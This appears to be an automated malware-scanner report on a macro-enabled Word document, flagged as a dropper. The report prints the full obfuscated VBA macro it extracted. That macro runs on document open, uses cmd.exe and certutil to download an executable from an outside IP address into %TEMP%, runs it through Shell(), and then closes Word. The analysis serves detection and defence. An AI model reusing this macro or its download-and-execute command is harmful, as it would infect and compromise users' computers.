MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample is an OOXML document containing a VBA macro that automatically executes upon opening. This macro utilizes the Shell() function and references cmd.exe, indicating an intent to download and execute a secondary payload. The presence of a Document_Open macro and the use of Shell() are strong indicators of a dropper or downloader malware.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-7083808-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7083808-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
k = "W" k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1)) End Sub -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
On Error Resume Next Set cpJwuFpoD = GetObject(, "Word.Application") If Not cpJwuFpoD Is Nothing Then -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _ "ce" & _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Call ewqgqybweryqghd -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://13.75.76.78/andd/Host_outputF07F1DF.exe In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13299 bytes |
SHA-256: 77d7c12aa4e52a5363c9821fd6e27335366dcb6061e5059e81af3ac9c8972a14 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
140 of 200 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call ewqgqybweryqghd
End Sub
Private Sub ewqgqybweryqghd()
Dim s34 As Object
If 88.2 = 22.2 Then
Else
End If
If 9 = 8 Then
Else
Dim mndmqdvqgfnbc As String
mndmqdvqgfnbc = "erYbnlZE.UOfImlcj"
Dim bbppgbniuxjjys
Application.Run bucvxatybaxwuvrp & mndmqdvqgfnbc & rxzp & trnfcjzm
End If
End Sub
Attribute VB_Name = "erYbnlZE"
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const hvdlurxavndib = 82204
#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const byony = 370
Private Declare PtrSafe Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const ctwbbbzcand = 5
#Else
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const rnlyxbgvoofcwhr = 86
Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type kvdcjmiicvywuywp
qggt As Long
End Type
#If VBA7 Then
#Else
#End If
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zgzy = 4047923
#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If
#If VBA7 Then
Const qhy = 96
Private Declare PtrSafe Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const hbltuxsemxvfve = 1
#Else
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const sihp = 10
Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If
Private Type kuyvlkniu
ibwqueakxygbv As Long
End Type
#If VBA7 Then
#Else
#End If
Public Sub UOfImlcj()
On Error Resume Next
'obgtjgowfezhueyr802ÙÇ©ÆÍ�¸®ã
'ÜÓ±½â�Ŧ֪?ÖÓ´Èݥéã?¤¦?
Dim fezhueyr As Integer
'jiukmfkdmmhlkocwxwbzurgq91
'9898
Dim obgtjgow(317) As String
obgtjgow(3) = "ÜÓ±½â�Ŧ֪?"
obgtjgow(5) = "ÖÓ´Èݥéã?¤¦?"
obgtjgow(1) = "ÙÇ©ÆÍ�¸®ã"
obgtjgow(6) = CStr(98)
'mcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'huzwubclbnpzztuebbhyidmkjftpndwymiwqsprwyikxbsygnn
'xcatpqhkedjirjfthquancmxav
Dim vzcrnewdjr As Variant
'kocwxwbzurgqfezhueyr91
'physuwblvg802
'ttrpbrqycdczlarphysuwblvg4232
Do Until 4503 = 4503
Dim huzwubclb As Object
Randomize
Loop
'802jiukmfkdmmhl
'898
'91fezhueyr
If toyvgyg = "ãÖÀÀÏ�¼»Þ??" Then
Dim tef
toyvgyg = 4071186761114#
End If
'brryaisesvmvlkhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'uczntaqbrrwyikxbsygnnpndwymiwqsprwyikxbsygnn
'wifzydvrbmcsiqnxhcwmogzlicmocnvcnhnpzztuebbhyidmk
'pndwymiwqsprwyikxbsygnnpndwymiwqsprwyikxbsygnn
'hquancmxavuczntaqbrrwyikxbsygnn
Select Case 37
Case Else
End Select
'jiukmfkdmmhl
'tefphysuwblvg#Q14
'toyvgyg
'4232physuwblvg
Dim akomhxtxmqvo, brwyikxbsygnn, czyhglqygod
For akomhxtxmqvo = 802 To 802 Step -1
czyhglqygod = 98
Next akomhxtxmqvo
Dim aryxmwwhhvnlwm As String
'komhxtxmqvojftjftrwyikxbsygnnhquancmxav
'rwyikxbsygnnhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'zyhglqygodrwyikxbsygnnrwyikxbsygnnhquancmxav
'npzztuebbhyidmkmcsiqnxhcwmogzlbrryaisesvmvlkhquancmxav
'jftmcsiqnxhcwmogzluczntaqbrrwyikxbsygnn
If IsDate(qdbkwpqnvxz) And ((8 + 802) / (4232 + 374369518)) <> 162384288395110# Then
wlb = "hjqag" & CStr("unuunwwbutw")
End If
'mywvdwycjftbrryaisesvmvlkhquancmxav
'icmocnvcnhnpzztuebbhyidmkbrryaisesvmvlkhquancmxav
'ÙÇ©ÆÍ�¸®ãQ14
'ÖÓ´Èݥéã?¤¦?Q11
'sdcypwcfnwzqpwlzioo73921134ëÕ¨ËѤƼé®
'ÚשÎß�¿ÞÖ¸Ê
Dim ioo As Integer
'ojlomawbtymo35165612
'2121
Dim sdcypwcfnwzqpwlz(444) As String
sdcypwcfnwzqpwlz(7) = "ÚשÎß�¿"
sdcypwcfnwzqpwlz(5) = "ÞÖ¸Ê"
sdcypwcfnwzqpwlz(4) = "ëÕ¨ËѤƼé®"
sdcypwcfnwzqpwlz(4) = CStr(21)
'lgcdppnjxvesnjmmcmpavbfsemx
'egyiswtzlehbvfxxqnsazndbclmppnjxvesnjmmcmpavbfsemx
'jgcmgtnlximaaysazndbclmixctlkegikai
Dim bxyapoajyjw As Variant
'omawbtymoioo35165612
'sfnxcptgvlezxmvg73921134
'nuxaexibgvxyldcsfnxcptgvlezxmvg65282
Do Until 1182 = 1182
Dim egyiswtzlehb As Object
Randomize
Loop
'73921134ojl
'136794321
'35165612ioo
If uuyouhtsoshdoxn = "âľÉÍ" Then
Dim gdg
uuyouhtsoshdoxn = 93499963983#
End If
'diqsixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'cwftpamgypavbfsemxppnjxvesnjmmcmpavbfsemx
'spdahaklclgcdcwlgnadzynenfvfxxqn
'ppnjxvesnjmmcmpavbfsemxppnjxvesnjmmcmpavbfsemx
'ixctlkegikaicwftpamgypavbfsemx
Select Case 40
Case Else
End Select
'ojl
'gdgsfnxcptgvlezxmvg#Q14
'uuyouhtsoshdoxn
'65282sfnxcptgvlezxmvg
Dim adiyh, bpavbfsemx, ckfs
For adiyh = 73921134 To 73921134 Step -1
ckfs = 21
Next adiyh
Dim drhdbarmcmqhnemh As String
'diyhsazndbclmsazndbclmpavbfsemxixctlkegikai
'pavbfsemxixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'kfspavbfsemxpavbfsemxixctlkegikai
'vfxxqnlgcddiqsixctlkegikai
'sazndbclmlgcdcwftpamgypavbfsemx
If IsDate(wpsavvjh) And ((1367943 + 73921134) / (65282 + 7321042)) <> 3937242557207# Then
nurmv = "zbudto" & CStr("lpriufnalxwfve")
End If
'cnnobwhnvvxsazndbclmdiqsixctlkegikai
'cwlgnadzynenfvfxxqndiqsixctlkegikai
'ëÕ¨ËѤƼé®Q14
'ÞÖ¸ÊQ11
If "DiUdvYYkaXFlJStAUnlrdpbLm" = "YBbYhDxeMgaOgBUysdJrVrLP" Then
gRiANHJrTzXJCpBn = "FNaFHkXewyBuGgqLHBmOeyZQXM"
wp = "oHDqlypMZgLWQIHwNThxuoOYAGnJhujaoGKu"
QurWucFDHiQJbzhPsvAsfpeKfeexkhKyNFxY = 6.22257731574995E+33
End If
Do Until "bZbbQeJFnxrREAVXsLyLtZJRbOh" <> "CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt"
sXhb = "lUTeGuMxcZbBKfZuMpKhLNVgbfNJgbFEQMg"
jlDFpAldxBUnTJfi = 373456919159794#
udYymCahDQAUXlxzHLbl = "sLbrj"
LZpXvWhVjHTxicYljkJZQW = 28934
MyEwRBSwHCdPINtFxqPOroNsIgGbriJJokd = "raPTQLMuFNQXqeMjAHxXkL"
lvrEYtUaXkUOWavygcTnvQikNVZIhmFpf = 3.23840053692693E+29
eYYGnAkmsnVQpJEJRvQXrVMGrDULtlefi = 6.81339610724978E+20
vXZZpTCJXuPwgPEXUKYIvJMSOjgZtG = 2.9383642571979E+42
qiGOhkrFx = "ixRrvWFHVQTGanmKHL"
mdPQlY = "aAXndEbnMLuaT"
bRXqpjIScWdg = 4.00053506930871E+25
bZbbQeJFnxrREAVXsLyLtZJRbOh = CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt
Loop
Do While 654 < 2
Select Case mrjbvyvrrtenqmi
Case "éзÀà�´¦í?¡??¦É¬", "ÓȾÆÞ?Ĺ֣??", "ßźÂà?®´á?"
zxcbnmmf1 = "àÄ®ÁÝ¥µ¦Ö£???¿"
Case "ÛÚ©", "àʨÎÔ¥ºµÙ?�?¥"
zxcbnmmf2 = "ØÓºÔ"
Case "ÛÖ¿¾Ð?»«ë®¡", "ÝϧÏÖ?³"
zxcbnmmf3 = "ìȵÐ"
Case Else
zxcbnmmf4 = "soaixylctbkejfr"
End Select
Exit Do
Randomize
Loop
Dim jepemzlaqkbwp As String
Dim xuhbj As Integer
xuhbj = 4364
jepemzlaqkbwp = "3RLivxKEmgZ2X1Fi"
Do While 847 < 7
Select Case oveebpdbvzlgoat
Case "à̬ÈÖ?Æ©ç¢", "ÛÖÀÇÍ?", "âöÁÒ£¹"
zxcbnmmf1 = "ë̽Ê?Ʀæ??"
Case "ÜÙ¹¿â¤¯¬", "éÖ«Èѣ¥è§?"
zxcbnmmf2 = "äÛ´Åß?º¥"
Case "ÞÒ»ÈÝ?°²", "ÕʸÂÒ?Á¹Ø©??"
zxcbnmmf3 = "ÓмÏÞ?"
Case Else
zxcbnmmf4 = "qfuifr"
End Select
Exit Do
Randomize
Loop
Dim nyzsktufmsu As String
Dim xghe As Integer
xghe = 4364
nyzsktufmsu = "3RLivxKEmgZ2X1Fi"
If 9324.234 + 2345.23 = 23566.2 Then
Else
lop = "tes098ll65435467889654356786543535353534534553453543535354ce1"
lop = Right(Left(lop, 8), 0.005 * 101)
lop1 = "tes098ce65435467889654356786543535353534534553453543535354ce1"
'lop = lop + Right(Left(lop1, 8), 0.005 * 200)
pol = Mid("sd98567879865432234567899765432gdc8e9895", 0.004 * 49911)
pol = lop
End If
a = Left("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1)
'Right function
b = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzH", 1)
f = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzT", 1)
'Mid function
c = Mid("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1, 11)
'Split function
d = Split("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
"ce" & _
"rtuti" & pol & _
" " & _
"-urlcache" & _
" " & _
"-split" & _
" " & _
"-f" & _
" " & _
"http://13.75.76.78/andd/Host_outputF07F1DF.exe" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif" & _
"&" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif"
zmeqzvkwmnyx (vzurddc)
Do Until "ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp" <> "oEBBpgIqSBhjPsU"
eluQ = 1.08325364430548E+19
lgHA = "vAQOpjbygHNMdbTaTrsJy"
dRDOfZNCYtASkIZDLxHQLNpRHSwdRoP = "ZLWzKbECkeiULLqKAPguChZQclHMckkkeKtZ"
ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp = oEBBpgIqSBhjPsU
Loop
While "dMhLjRyFwxOVLroCTSXj" = "LmiMZQdgtCkwD"
kPEcABZdSrpIFCfdvvyIRZzyKBVYDveZIzEmO = "XinhTqXRLaAPGpxuZKQGRyfBZXNQzFytPFX"
VkFIbtquXooobOZ = "WIXZCmHwdGRFcHzBRgZpFHeYHkdliYolfEWGiy"
icIfUbkSPpnWu = "koPeyRRIWNESfaXlsSTTqMwbJxXSNwvBtwu"
GcjgvZGvbCvKuew = "DbyXrnUBuzuaRCYifH"
PinXQGBAHBMYjzaySyWYTIimwf = 6.7326294951552E+28
dYdMemzglPDiRqnMAhbLarDGkIiL = 4.23992557355971E+17
ABblZXb = 308547930842765#
Wend
EkeQQxZa
End Sub
Private Sub EkeQQxZa()
Dim cpJwuFpoD As Object
Do
On Error Resume Next
Set cpJwuFpoD = GetObject(, "Word.Application")
If Not cpJwuFpoD Is Nothing Then
cpJwuFpoD.Quit
Set cpJwuFpoD = Nothing
End If
Loop Until cpJwuFpoD Is Nothing
End Sub
Sub zmeqzvkwmnyx(StFmCsaKO As String)
While "wMdIKSkVAhsxAH" = "obHtnbgiOMbDU"
bZdwYIHwoqxFGVEEHBhihQVQjoPePwiPQbZHOA = 8.88143014062935E+30
yGrmQvhULeJFZVlMKENNksdh = "HipewwqGZicpeEUBTEzFrItePOCBnrGcKuJNr"
OhTyAmJXgAtMQodbByoLPiuoShczekvGJdqR = "sIHVrhCHbbRyjtKZgagnefTKJswFmCnx"
pIqhqXArgrG = 6.11922130360933E+20
Wend
k = "W"
k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 37888 bytes |
SHA-256: 0e289b33430de45c0cef680ce4b213b40b29ee1bb03be350aecdcacdb414c9dc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
322 of 489 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.